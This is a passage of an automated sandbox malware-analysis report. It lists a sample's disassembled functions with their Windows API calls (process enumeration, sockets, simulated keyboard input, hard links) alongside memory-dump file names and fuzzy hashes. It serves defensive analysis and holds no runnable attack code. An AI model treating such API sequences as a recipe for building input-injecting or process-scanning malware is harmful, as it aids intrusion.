                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e1c74f0ea60a127628bcd498bb3a3c6f1063883a4e23dc7dbac2550235d537fb
                                                                                                                                                                                                                                                                  • Instruction ID: 07b8bb95c7c643022b44376cbe81e506479759036b2c4866cb05a31cc66fc23e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1c74f0ea60a127628bcd498bb3a3c6f1063883a4e23dc7dbac2550235d537fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AC16F75A00216EFDB14CF94C894EAEBBB5FF48704F148598E605EB251D731EE81DBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                  • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                  • Instruction ID: c9a8ed4c83bc8686f64bd23b22bb06b2cc028977c5e43312080627fb42f05cda
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11A16871900386BFDB22CF18E8917EEBBE4EF25314F28416DE5959B281CA7499C2C770
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00D80BD4,?), ref: 00D40EE0
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00D80BD4,?), ref: 00D40EF8
                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00D7DCE0,000000FF,?,00000000,00000800,00000000,?,00D80BD4,?), ref: 00D40F1D
                                                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00D40F3E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 314563124-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9812ba1518a6fccf0946851e675aa510c7d34a1ad287a02126d1722a7d58c0fd
                                                                                                                                                                                                                                                                  • Instruction ID: 1f1aceccac60605510df8d4927536046b9c64d8fbc6e6b485e5cae0ed77cf496
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9812ba1518a6fccf0946851e675aa510c7d34a1ad287a02126d1722a7d58c0fd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F811D71A00109EFCB14DF94C984DEEBBB9FF89315F144568F606AB250DB71AE06CB60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00D6B10C
                                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00D6B11A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00D6B1FC
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6B20B
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D24D73,?), ref: 00CFE395
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                  • Opcode ID: 55f6c4cec2ea8017ee13177fd597dba4802b07ba9780ea0d5202a36f90708221
                                                                                                                                                                                                                                                                  • Instruction ID: ba892dd077fcda4425e452c8f44390534a1b73cd04e05d6ea5e80d9d0422f33c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55f6c4cec2ea8017ee13177fd597dba4802b07ba9780ea0d5202a36f90708221
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0514971508340AFC710EF25C886A6BBBE8FF89754F40491DF989D7261EB71D904CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00D6255A
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D62568
                                                                                                                                                                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00D625E7
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D625F1
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D76D1A
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00D76D4D
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00D76DBA
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00D561C8
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00D561EE
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00D56213
                                                                                                                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00D5623F
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00D4B473
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 00D4B48F
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00D4B4FD
                                                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00D4B54F
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                                                  • Opcode ID: d361362d9579a92f87e27fc52de38bbc5cc4074f6846b9ccc3b1c0d2388622fe
                                                                                                                                                                                                                                                                  • Instruction ID: 885a6b6ecf85dcbcfe949bef7372e52efb3febe7c3a8fe263fb98ad9846d3653
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d361362d9579a92f87e27fc52de38bbc5cc4074f6846b9ccc3b1c0d2388622fe
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31F670A406086BFF308B2588057FABBB6EF69334F08421BE49A961D6D774C9858771
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00D4B5B8
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D4B5D4
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D4B63B
                                                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00D4B68D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6c9462d722f86d0c519ada8b0c40c2dd55943287d31ed59236f88db465ff7753
                                                                                                                                                                                                                                                                  • Instruction ID: 4275317d661973a083c5760a9b52ab1f60de20ce23040d79f28da9aa2529545f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c9462d722f86d0c519ada8b0c40c2dd55943287d31ed59236f88db465ff7753
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D312B309406586FFF348B6888057FE7BB6EFA5330F09422BE4859A1D1D374CA868B75
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00D780D4
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D7814A
                                                                                                                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00D7815A
                                                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00D781C6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                  • Opcode ID: 42ee93e984b79add07bd5c6a9510ee26ec6d9ae0e280f1d814c8ad5225f4318a
                                                                                                                                                                                                                                                                  • Instruction ID: c9d26658430e28ac5d858759634ec93b44486d50347ea4dc4a1df051938a697e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42ee93e984b79add07bd5c6a9510ee26ec6d9ae0e280f1d814c8ad5225f4318a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC418B31A40315DFCB11CF58C888AA9B7B5FF45310F5881A9E958DB361EB30E842DF60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00D72187
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D443AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: GetCurrentThreadId.KERNEL32 ref: 00D443B4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D44393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D42F00), ref: 00D443BB
                                                                                                                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00D7219B
                                                                                                                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00D721E8
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00D721EE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9f3ee09ca94ddb03c8e6f255f89fa5a34749b9edb5e172daed4f7c9f356fe39b
                                                                                                                                                                                                                                                                  • Instruction ID: a4d5c62f0f7806cee11f7de147332e3039ab3a89b2ad5a632a150e645323a3f1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f3ee09ca94ddb03c8e6f255f89fa5a34749b9edb5e172daed4f7c9f356fe39b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3314471D00249AFCB04DFAAC885DAEB7FDEF48304B54846AE419E7211EB71DE45DBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E8E2
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E8F9
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E924
                                                                                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00D4E92F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
• Opcode ID: 4654a427ce2cda2512823543ab2398efdee7adb35416e7ce844639bc7b636eb9
• Instruction ID: d22e6e257b70bca164247ffef4a3e3884378ed55dbba55fb364468a49c7f1f24
• Opcode Fuzzy Hash: 4654a427ce2cda2512823543ab2398efdee7adb35416e7ce844639bc7b636eb9
• Instruction Fuzzy Hash: 6F21A172D00214BFDB10AFA8D982BAEBBF9EF55350F144065E908AB281D6709E418BB1
APIs
  • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
• GetCursorPos.USER32(?), ref: 00D79A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00D79A72
• GetCursorPos.USER32(?), ref: 00D79ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00D79AF0
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
• Opcode ID: e4e214f5d0c611a39382b05bd699dc358c0170746de644fee0127f7d3c4e360f
• Instruction ID: b543d39be7f316e19d4e64c3c6c6c73591a5204159076699879a75e86b548a5b
• Opcode Fuzzy Hash: e4e214f5d0c611a39382b05bd699dc358c0170746de644fee0127f7d3c4e360f
• Instruction Fuzzy Hash: D221A036501118EFCF258F54C858EFABBBAEF09310F448155F90987261E7309950DBB0
APIs
• GetFileAttributesW.KERNEL32(?,00D7DC30), ref: 00D4DBA6
• GetLastError.KERNEL32 ref: 00D4DBB5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00D4DBC4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00D7DC30), ref: 00D4DC21
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 9f1005f6cc92adc4dcd994b21db5862ec7f1e7ca56d7401f0053398482e97b2a
• Instruction ID: ecc48f04d1e9994d6b7aec2a4f449b8f3fc85723aa4de6134c6f0fb47bb9b290
• Opcode Fuzzy Hash: 9f1005f6cc92adc4dcd994b21db5862ec7f1e7ca56d7401f0053398482e97b2a
• Instruction Fuzzy Hash: BD21B2305083019F8700DF28C88186BB7F9EE5A364F144A1DF499D72A2EB71DD4ADBA2
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00D732A6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D732C0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00D732CE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00D732DC
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: b0164ca482f232b185f203548c0a04cf74712a670670c276d8bbcbaf281890b6
• Instruction ID: 32b47cbe0d882221443d124bc89507b1c7edc16f6e6db4ce33d216c0901c1d13
• Opcode Fuzzy Hash: b0164ca482f232b185f203548c0a04cf74712a670670c276d8bbcbaf281890b6
• Instruction Fuzzy Hash: 8121C431204211AFD7149B24C845FAA7BA5EF81314F24C25CF82A8B2D2D771ED81D7E4
APIs
  • Part of subcall function 00D496E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00D48271,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?), ref: 00D496F3
  • Part of subcall function 00D496E4: lstrcpyW.KERNEL32(00000000,?,?,00D48271,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D49719
  • Part of subcall function 00D496E4: lstrcmpiW.KERNEL32(00000000,?,00D48271,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?), ref: 00D4974A
• lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D4828A
• lstrcpyW.KERNEL32(00000000,?,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D482B0
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00D490BB,00000000,?,0000001C,?,?,00000000), ref: 00D482EB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 6b34a330db41a2888896d401ae949855dacd81b762ddb84016b2cc1d148bd852
• Instruction ID: 8c973c159c3501c6df6a2274b00fb3daf442c16ba6b5ab2a266619eb38676337
• Opcode Fuzzy Hash: 6b34a330db41a2888896d401ae949855dacd81b762ddb84016b2cc1d148bd852
• Instruction Fuzzy Hash: B111033A200342ABCB149F38C844E7E77A9FF45790B50402AF946C7294EF719801D7B5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 00D7615A
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7616C
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D76177
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00D762B5
Memory Dump Source
